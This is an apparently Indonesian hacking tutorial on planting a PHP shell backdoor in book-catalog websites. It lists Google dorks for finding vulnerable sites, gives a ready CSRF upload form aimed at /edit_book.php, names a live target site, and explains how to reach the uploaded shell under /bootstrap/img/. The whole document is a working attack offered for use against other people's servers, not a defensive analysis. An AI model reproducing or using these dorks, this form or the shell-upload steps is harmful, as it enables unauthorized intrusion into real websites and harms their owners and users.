- Google Dork :
inurl:/book.php?bookisbn=
inurl:/bookPerPub.php?pubid=
inurl:/books.php "Full Catalogs of Books"
- Shell Backdoor
- Exploit : /edit_book.php
- Csrf
<form method="post" action="http://targetlu" enctype="multipart/form-data">
<td><input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"></td>
<td><input type="text" name="author" value="Sukabumi BlackHat | Ditz?" required></td>
<td><input type="file" name="image"></td>
<input type="submit" name="save_change" value="Change" class="btn btn-primary">
</form>
Kalian simpan csrf nya dengan ex .html
Oke disini live target saya https://cmcs.hjes.in/OPAC/books.php
Gua rasa klian jg udh punya target :v
Lalu cek vuln atau tidak nya dengan masukan /edit_book.php dibagian url target kalian masing - masing.
Contoh :
https://localhost/edit_book.php
Atau
https://localhost/[path]/edit_book.php
Jika muncul kek di ss kemungkinan vuln
Lalu buka csrf nya,ingat yah bagian angka sama nama sukabumi blackhat jangan di ubah jika tidak mau eror :v
Jika pas di pencet change kalian langsung di arahkan ke index.php nya berarti shel klian berhasil terupload untuk akses shel backdoornya di path /bootstrap/img/YOURNAMESHELL.php
Contoh :
https://localhost/bootstrap/img/shell.php
Atau
https://localhost/[path]/bootstrap/img/shell.php